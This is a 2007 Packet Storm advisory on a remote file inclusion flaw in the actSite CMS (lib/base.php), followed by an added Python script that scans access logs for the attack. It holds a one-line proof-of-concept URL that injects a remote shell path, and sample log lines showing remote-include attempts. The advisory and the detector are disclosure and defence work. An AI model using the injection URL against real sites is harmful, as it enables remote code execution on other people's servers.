actsitebase-rfi.txt

2007-10-02T00:00:00
ID PACKETSTORM:59716
Type packetstorm
Reporter DNX
Modified 2007-10-02T00:00:00

Description

                                        
                          \#'#/
                          (-.-)
---------------------oOO---(_)---OOo--------------------
| actSite v1.991 Beta (base.php) Remote File Inclusion |
|                     coded by DNX                     |
--------------------------------------------------------

[!] Discovered: DNX
[!] Vendor: http://www.actsite.de
[!] Detected: 02.09.2007
[!] Reported: 02.09.2007
[!] Remote: yes

[!] Background: actSite is a content management system based on PHP and MySQL

[!] Bug: $BaseCfg[BaseDir] in lib/base.php

[!] PoC:
- http://[site]/[path]/lib/base.php?BaseCfg[BaseDir]=[shell]

[!] Solution: Install update to v1.995
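
Added example (not part of the original advisory and not actSite code): a Python check that scans web-server access logs for the request shape shown in the PoC, including percent-encoded brackets. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Assumed input: Apache/nginx "combined" access-log lines.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# A value starting with a URL scheme / stream wrapper, "//" or "\\" points the include off-host.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*://|//|\\\\)', re.I)
PARAM = "BaseCfg[BaseDir]"   # variable named in the advisory
SCRIPT = "/lib/base.php"     # file named in the advisory

def classify(line):
    """Return None, 'override' or 'remote-include' for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if not unquote(path).lower().endswith(SCRIPT):
        return None
    verdict = None
    # parse_qsl percent-decodes, so BaseCfg%5BBaseDir%5D=http%3A%2F%2F... is caught as well.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name == PARAM:
            if REMOTE_RE.match(value):
                return "remote-include"
            verdict = "override"   # any request-supplied value deserves review
    return verdict

def scan(lines):
    """Return (client_ip, verdict) for every line that touches the parameter."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            hits.append((LOG_RE.match(line).group("ip"), verdict))
    return hits

# Constructed sample log lines (documentation addresses and .invalid hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Oct/2007:10:00:01 +0000] "GET /cms/index.php?page=2 HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.7 - - [02/Oct/2007:10:00:05 +0000] "GET /cms/lib/base.php?BaseCfg[BaseDir]=http://files.example.invalid/a.txt? HTTP/1.1" 200 310 "-" "-"',
    '198.51.100.8 - - [02/Oct/2007:10:00:09 +0000] "GET /cms/lib/base.php?BaseCfg%5BBaseDir%5D=ftp%3A%2F%2Ffiles.example.invalid%2Fa HTTP/1.0" 200 310 "-" "-"',
    '203.0.113.4 - - [02/Oct/2007:10:00:12 +0000] "GET /cms/lib/base.php?BaseCfg[BaseDir]=../ HTTP/1.1" 200 0 "-" "-"',
]

if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(f"{verdict:15} {ip}")
```

Hits on hosts still running a release older than v1.995 are the ones to triage first, since the advisory gives that update as the fix.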